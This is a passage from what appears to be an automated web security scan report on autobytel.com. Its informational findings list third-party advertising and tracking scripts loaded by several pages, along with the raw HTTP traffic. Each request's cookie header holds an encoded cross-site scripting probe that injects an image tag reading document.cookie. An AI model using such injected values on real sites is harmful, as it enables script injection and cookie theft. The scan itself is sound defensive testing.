       <script src="http://an.tacoda.net/an/17295/slf.js" type="text/javascript"></script>
...[SNIP]...
</script>

<SCRIPT
   TYPE="text/javascript"
   SRC="http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no">
</SCRIPT>
...[SNIP]...

21.541. http://www.autobytel.com/content/research/kbb/index.cfm/action/selectyear/valuetype/TI

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/research/kbb/index.cfm/action/selectyear/valuetype/TI

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||476B8AE9-AB43-0981-3285AB9974B79EFC|||13148|||;sz=728x90;ptile=1;!cat=;ord=94420380?
  • http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;u=|||476B8AE9-AB43-0981-3285AB9974B79EFC|||13148|||;sz=160x600;ptile=3;!cat=;ord=94420380?
  • http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;u=|||476B8AE9-AB43-0981-3285AB9974B79EFC|||13148|||;sz=300x250;ptile=2;!cat=;ord=94420380?
  • http://ad.doubleclick.net/adj/abtl.research/;kw=;info=13148;u=|||476B8AE9-AB43-0981-3285AB9974B79EFC|||13148|||;sz=1x3;!cat=;ord=94420380?
  • http://an.tacoda.net/an/17295/slf.js
  • http://js.revsci.net/gateway/gw.js?csid=K04491
  • http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no
  • http://www.bkrtx.com/js/bk-static.js

Request

GET /content/research/kbb/index.cfm/action/selectyear/valuetype/TI HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:24:28 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:24:28 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:24:28 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:24:28 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 37489


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
B8AE9-AB43-0981-3285AB9974B79EFC|||13148|||;sz=728x90;ptile=1;!cat=;ord=94420380?" name="frame1" width="728" height="90" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
       <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||476B8AE9-AB43-0981-3285AB9974B79EFC|||13148|||;sz=728x90;ptile=1;!cat=;ord=94420380?"></SCRIPT>
...[SNIP]...
9-AB43-0981-3285AB9974B79EFC|||13148|||;sz=300x250;ptile=2;!cat=;ord=94420380?" name="frame1" width="300" height="250" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
               <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;u=|||476B8AE9-AB43-0981-3285AB9974B79EFC|||13148|||;sz=300x250;ptile=2;!cat=;ord=94420380?">
               </SCRIPT>
...[SNIP]...
<div>
           <script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/abtl.research/;kw=;info=13148;u=|||476B8AE9-AB43-0981-3285AB9974B79EFC|||13148|||;sz=1x3;!cat=;ord=94420380?"></script>
...[SNIP]...
AE9-AB43-0981-3285AB9974B79EFC|||13148|||;sz=160x600;ptile=3;!cat=;ord=94420380?" name="frame1" width="160" height="600" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
       <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;u=|||476B8AE9-AB43-0981-3285AB9974B79EFC|||13148|||;sz=160x600;ptile=3;!cat=;ord=94420380?">
       </SCRIPT>
...[SNIP]...
</iframe>
       
       <script type="text/javascript" src="http://www.bkrtx.com/js/bk-static.js"></script>
...[SNIP]...
<!-- End: Blue Kai -->
       
       
       <script src="http://js.revsci.net/gateway/gw.js?csid=K04491"></script>
...[SNIP]...
</script>
       <script src="http://an.tacoda.net/an/17295/slf.js" type="text/javascript"></script>
...[SNIP]...
</script>

<SCRIPT
   TYPE="text/javascript"
   SRC="http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no">
</SCRIPT>
...[SNIP]...

21.542. http://www.autobytel.com/content/research/top10/index.cfm/action/top10/vehicleclass/all/listtype/1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/research/top10/index.cfm/action/top10/vehicleclass/all/listtype/1

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ad.doubleclick.net/adj/abtl.research/Toyota_Highlander;abr=!ie;kw=Toyota_Highlander;info=13148;dcopt=ist;u=|||476D64C0-EE00-BBDB-657AF33F53FAD5AE|||13148|||;sz=728x90;ptile=1;!cat=Toyota;ord=10294908?
  • http://ad.doubleclick.net/adj/abtl.research/Toyota_Highlander;abr=!ie;kw=Toyota_Highlander;info=13148;u=|||476D64C0-EE00-BBDB-657AF33F53FAD5AE|||13148|||;sz=160x600;ptile=2;!cat=Toyota;ord=10294908?
  • http://ad.doubleclick.net/adj/abtl.research/Toyota_Highlander;kw=Toyota_Highlander;info=13148;u=|||476D64C0-EE00-BBDB-657AF33F53FAD5AE|||13148|||;sz=1x3;!cat=Toyota;ord=10294908?
  • http://an.tacoda.net/an/17295/slf.js
  • http://js.revsci.net/gateway/gw.js?csid=K04491
  • http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=toyota&cmodel=highlander&new=yes&type=&ins=no
  • http://www.bkrtx.com/js/bk-static.js

Request

GET /content/research/top10/index.cfm/action/top10/vehicleclass/all/listtype/1 HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:24:40 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:24:40 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:24:40 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:24:40 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 34688


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
EE00-BBDB-657AF33F53FAD5AE|||13148|||;sz=728x90;ptile=1;!cat=Toyota;ord=10294908?" name="frame1" width="728" height="90" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
       <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.research/Toyota_Highlander;abr=!ie;kw=Toyota_Highlander;info=13148;dcopt=ist;u=|||476D64C0-EE00-BBDB-657AF33F53FAD5AE|||13148|||;sz=728x90;ptile=1;!cat=Toyota;ord=10294908?"></SCRIPT>
...[SNIP]...
<div>
           <script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/abtl.research/Toyota_Highlander;kw=Toyota_Highlander;info=13148;u=|||476D64C0-EE00-BBDB-657AF33F53FAD5AE|||13148|||;sz=1x3;!cat=Toyota;ord=10294908?"></script>
...[SNIP]...
00-BBDB-657AF33F53FAD5AE|||13148|||;sz=160x600;ptile=2;!cat=Toyota;ord=10294908?" name="frame1" width="160" height="600" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
       <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.research/Toyota_Highlander;abr=!ie;kw=Toyota_Highlander;info=13148;u=|||476D64C0-EE00-BBDB-657AF33F53FAD5AE|||13148|||;sz=160x600;ptile=2;!cat=Toyota;ord=10294908?">
       </SCRIPT>
...[SNIP]...
</iframe>
       
       <script type="text/javascript" src="http://www.bkrtx.com/js/bk-static.js"></script>
...[SNIP]...
<!-- End: Blue Kai -->
       
       
       <script src="http://js.revsci.net/gateway/gw.js?csid=K04491"></script>
...[SNIP]...
</script>
       <script src="http://an.tacoda.net/an/17295/slf.js" type="text/javascript"></script>
...[SNIP]...
</script>

<SCRIPT
   TYPE="text/javascript"
   SRC="http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=toyota&cmodel=highlander&new=yes&type=&ins=no">
</SCRIPT>
...[SNIP]...

21.543. http://www.autobytel.com/coupons/my-garage.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /coupons/my-garage.htm

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://an.tacoda.net/an/17295/slf.js
  • http://js.revsci.net/gateway/gw.js?csid=K04491
  • http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no
  • http://www.bkrtx.com/js/bk-static.js

Request

GET /coupons/my-garage.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:48:52 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:48:52 GMT
Content-Length: 22109
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:48:52 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: PV_CT=3;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
</iframe>
       
       <script type="text/javascript" src="http://www.bkrtx.com/js/bk-static.js"></script>
...[SNIP]...
<!-- End: Blue Kai -->
       
       
       <script src="http://js.revsci.net/gateway/gw.js?csid=K04491"></script>
...[SNIP]...
</script>
       <script src="http://an.tacoda.net/an/17295/slf.js" type="text/javascript"></script>
...[SNIP]...
</script>

<SCRIPT
   TYPE="text/javascript"
   SRC="http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no">
</SCRIPT>
...[SNIP]...

21.544. http://www.autobytel.com/diagnose-problem/my-garage.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /diagnose-problem/my-garage.htm

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://an.tacoda.net/an/17295/slf.js
  • http://js.revsci.net/gateway/gw.js?csid=K04491
  • http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no
  • http://www.bkrtx.com/js/bk-static.js

Request

GET /diagnose-problem/my-garage.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:48:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:48:26 GMT
Content-Length: 22153
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:48:26 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: PV_CT=3;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
</iframe>
       
       <script type="text/javascript" src="http://www.bkrtx.com/js/bk-static.js"></script>
...[SNIP]...
<!-- End: Blue Kai -->
       
       
       <script src="http://js.revsci.net/gateway/gw.js?csid=K04491"></script>
...[SNIP]...
</script>
       <script src="http://an.tacoda.net/an/17295/slf.js" type="text/javascript"></script>
...[SNIP]...
</script>

<SCRIPT
   TYPE="text/javascript"
   SRC="http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no">
</SCRIPT>
...[SNIP]...

21.545. http://www.autobytel.com/my-garage.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /my-garage.htm

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://an.tacoda.net/an/17295/slf.js
  • http://js.revsci.net/gateway/gw.js?csid=K04491
  • http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no
  • http://www.bkrtx.com/js/bk-static.js

Request

GET /my-garage.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:48:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:48:06 GMT
Content-Length: 22031
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:48:05 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: PV_CT=3;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
</iframe>
       
       <script type="text/javascript" src="http://www.bkrtx.com/js/bk-static.js"></script>
...[SNIP]...
<!-- End: Blue Kai -->
       
       
       <script src="http://js.revsci.net/gateway/gw.js?csid=K04491"></script>
...[SNIP]...
</script>
       <script src="http://an.tacoda.net/an/17295/slf.js" type="text/javascript"></script>
...[SNIP]...
</script>

<SCRIPT
   TYPE="text/javascript"
   SRC="http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no">
</SCRIPT>
...[SNIP]...

21.546. http://www.autobytel.com/new-car-price-quotes.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /new-car-price-quotes.htm

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||481E668C-9F93-BF8A-30A0569CC14F30D7|||13148|||;sz=728x90;ptile=1;!cat=;ord=54427565?
  • http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;u=|||481E668C-9F93-BF8A-30A0569CC14F30D7|||13148|||;sz=160x600;ptile=2;!cat=;ord=54427565?
  • http://an.tacoda.net/an/17295/slf.js
  • http://js.revsci.net/gateway/gw.js?csid=K04491
  • http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no
  • http://www.bkrtx.com/js/bk-static.js

Request

GET /new-car-price-quotes.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:44:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:44:00 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:44:00 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:44:00 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 62665


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
E668C-9F93-BF8A-30A0569CC14F30D7|||13148|||;sz=728x90;ptile=1;!cat=;ord=54427565?" name="frame1" width="728" height="90" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
       <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||481E668C-9F93-BF8A-30A0569CC14F30D7|||13148|||;sz=728x90;ptile=1;!cat=;ord=54427565?"></SCRIPT>
...[SNIP]...
68C-9F93-BF8A-30A0569CC14F30D7|||13148|||;sz=160x600;ptile=2;!cat=;ord=54427565?" name="frame1" width="160" height="600" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
       <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;u=|||481E668C-9F93-BF8A-30A0569CC14F30D7|||13148|||;sz=160x600;ptile=2;!cat=;ord=54427565?">
       </SCRIPT>
...[SNIP]...
</iframe>
       
       <script type="text/javascript" src="http://www.bkrtx.com/js/bk-static.js"></script>
...[SNIP]...
<!-- End: Blue Kai -->
       
       
       <script src="http://js.revsci.net/gateway/gw.js?csid=K04491"></script>
...[SNIP]...
</script>
       <script src="http://an.tacoda.net/an/17295/slf.js" type="text/javascript"></script>
...[SNIP]...
</script>

<SCRIPT
   TYPE="text/javascript"
   SRC="http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no">
</SCRIPT>
...[SNIP]...

21.547. http://www.autobytel.com/new-cars.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /new-cars.htm

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ad.doubleclick.net/adj/abtl.research/rhp;abr=!ie;kw=rhp;info=13148;dcopt=ist;u=|||480FA8AF-D826-8F7B-FDB4CC6EAAC9BEC4|||13148|||;sz=728x90;ptile=1;!cat=;ord=38178938?
  • http://ad.doubleclick.net/adj/abtl.research/rhp;abr=!ie;kw=rhp;info=13148;u=|||480FA8AF-D826-8F7B-FDB4CC6EAAC9BEC4|||13148|||;sz=160x600;ptile=3;!cat=;ord=38178938?
  • http://ad.doubleclick.net/adj/abtl.research/rhp;abr=!ie;kw=rhp;u=|||480FA8AF-D826-8F7B-FDB4CC6EAAC9BEC4|||13148|||;sz=300x250;ptile=2;!cat=;ord=38178938?
  • http://ad.doubleclick.net/adj/abtl.research/rhp;kw=rhp;info=13148;u=|||480FA8AF-D826-8F7B-FDB4CC6EAAC9BEC4|||13148|||;sz=1x3;!cat=;ord=38178938?
  • http://an.tacoda.net/an/17295/slf.js
  • http://js.revsci.net/gateway/gw.js?csid=K04491
  • http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no
  • http://www.bkrtx.com/js/bk-static.js

Request

GET /new-cars.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:42:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:42:25 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:42:24 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:42:24 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 104069


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
FA8AF-D826-8F7B-FDB4CC6EAAC9BEC4|||13148|||;sz=728x90;ptile=1;!cat=;ord=38178938?" name="frame1" width="728" height="90" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
       <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.research/rhp;abr=!ie;kw=rhp;info=13148;dcopt=ist;u=|||480FA8AF-D826-8F7B-FDB4CC6EAAC9BEC4|||13148|||;sz=728x90;ptile=1;!cat=;ord=38178938?"></SCRIPT>
...[SNIP]...
F-D826-8F7B-FDB4CC6EAAC9BEC4|||13148|||;sz=300x250;ptile=2;!cat=;ord=38178938?" name="frame1" width="300" height="250" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
               <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.research/rhp;abr=!ie;kw=rhp;u=|||480FA8AF-D826-8F7B-FDB4CC6EAAC9BEC4|||13148|||;sz=300x250;ptile=2;!cat=;ord=38178938?">
               </SCRIPT>
...[SNIP]...
<div>
           <script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/abtl.research/rhp;kw=rhp;info=13148;u=|||480FA8AF-D826-8F7B-FDB4CC6EAAC9BEC4|||13148|||;sz=1x3;!cat=;ord=38178938?"></script>
...[SNIP]...
8AF-D826-8F7B-FDB4CC6EAAC9BEC4|||13148|||;sz=160x600;ptile=3;!cat=;ord=38178938?" name="frame1" width="160" height="600" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
       <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.research/rhp;abr=!ie;kw=rhp;info=13148;u=|||480FA8AF-D826-8F7B-FDB4CC6EAAC9BEC4|||13148|||;sz=160x600;ptile=3;!cat=;ord=38178938?">
       </SCRIPT>
...[SNIP]...
</iframe>
       
       <script type="text/javascript" src="http://www.bkrtx.com/js/bk-static.js"></script>
...[SNIP]...
<!-- End: Blue Kai -->
       
